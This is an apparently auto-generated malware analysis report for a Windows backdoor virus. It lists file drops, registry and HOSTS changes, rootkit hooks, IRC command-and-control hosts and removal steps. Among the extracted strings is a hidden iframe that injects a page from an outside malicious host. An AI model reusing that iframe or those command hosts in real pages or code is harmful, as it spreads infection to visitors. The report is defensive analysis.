Gen.Variant.Midie.35218_aa8055c655
Gen:Variant.Midie.35218 (BitDefender), Virus:Win32/Shodi.I (Microsoft), Virus.Win32.Virut.ce (Kaspersky), Virus.Win32.Shodi.i (v) (VIPRE), Win32.HLLP.Shohdi (DrWeb), Gen:Variant.Midie.35218 (B) (Emsisoft), Artemis!AA8055C6558F (McAfee), ML.Attribute.HighConfidence (Symantec), Backdoor.Win32.Hupigon (Ikarus), Gen:Variant.Midie.35218 (FSecure), Generic38.BGVL (AVG), Win32:Vitro (Avast), PE_SHODI_GB23009D.UVPM (TrendMicro), Gen:Variant.Midie.35218 (AdAware), VirusVirut.YR (Lavasoft MAS)
Behaviour: Backdoor, Virus
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: aa8055c6558ffcd6dc0f86dbf81f274f
SHA1: 2d95ae7bf1a0051664bbf7b80dc9b6c2371feba6
SHA256: cfeee2e862c377ad18f42135a65ff053b3e8fe3572fdb7babaddb1f84acbadaf
SSDeep: 3072:3TSccsWlXCFLcVygbDzwcnT7u7reWikKUBNe 31A:3aDCiDzwcnT67hNhA
Size: 177047 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit
Summary:
Backdoor. Malware that enables a remote control of victim's machine.
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
aa8055c6558ffcd6dc0f86dbf81f274f.usr:3416
ntvdm.exe:1480
The Backdoor injects its code into the following process(es):
%original file name%.exe:1796
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process ntvdm.exe:1480 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FB.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FA.tmp (335 bytes)
The Backdoor deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FA.tmp (0 bytes)
The process %original file name%.exe:1796 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\aa8055c6558ffcd6dc0f86dbf81f274f.usr (66189 bytes)
The Backdoor deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)
Registry activity
The process aa8055c6558ffcd6dc0f86dbf81f274f.usr:3416 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Identities]
"Identity Ordinal" = "2"
[HKCU\Software\Microsoft\WAB]
"NamedProps" = "04 20 06 00 00 00 00 00 C0 00 00 00 00 00 00 46"
[HKCU\Identities\{C692FCB0-9162-422E-94A4-4CD072B19CA9}]
"Identity Ordinal" = "1"
[HKCU\Software\Microsoft\WAB]
"NamedPropCount" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Identities]
"Changing"
"IncomingID"
"OutgoingID"
[HKCU\Software\Microsoft\WAB]
"NamedProps"
"NamedPropCount"
Dropped PE files
| MD5 | File path |
|---|---|
| 7f8e4af00552e9922d527f180389b6c9 | c:\aa8055c6558ffcd6dc0f86dbf81f274f.usr |
HOSTS file anomalies
The Backdoor modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | jL.chura.pl |
| 127.0.0.1 | validation.sls.microsoft.com |
Rootkit activity
The Backdoor installs the following user-mode hooks in ntdll.dll:
NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| 4096 | 16384 | 6656 | 5.29942 | ed41050c46cf2dea26cf5a8d78627828 | |
| .rsrc | 20480 | 102400 | 102400 | 3.08649 | 871890859be7e82fb07f51568a83a0ee |
| petite | 122880 | 379 | 512 | 2.83683 | d9152af36e3787ad41768ba5d11906da |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
8e7071100cf50f1426275c83d9a5bec0
URLs
| URL | IP |
|---|---|
| teredo.ipv6.microsoft.com |  157.56.106.189 |
| sys.zief.pl |  148.81.111.121 |
| dns.msftncsi.com | 131.107.255.255 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Reply Sinkhole - irc-sinkhole.cert.pl
Traffic
The Backdoor connects to the servers at the folowing location(s):
`.rsrc
D$(PSSh
ccRegVfy.exe
ccApp.exe
IEXPLORE.EXE
windows
\*.exe
@664>20[<0.
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
nddeapir.pdb
_acmdln
m.Zw%
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb
user32.dll
kernel32.dll
MSVCIRT.dll
MSVCRT.dll
5.1.2600.0 (xpclient.010817-1148)
NDDEAPIR.EXE
Windows
Operating System
5.1.2600.0
%original file name%.exe_1796_rwx_00401000_00002000:
D$(PSSh
%original file name%.exe_1796_rwx_00419000_00005000:
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
aa8055c6558ffcd6dc0f86dbf81f274f.usr:3416
ntvdm.exe:1480 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FB.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs22FA.tmp (335 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\aa8055c6558ffcd6dc0f86dbf81f274f.usr (66189 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
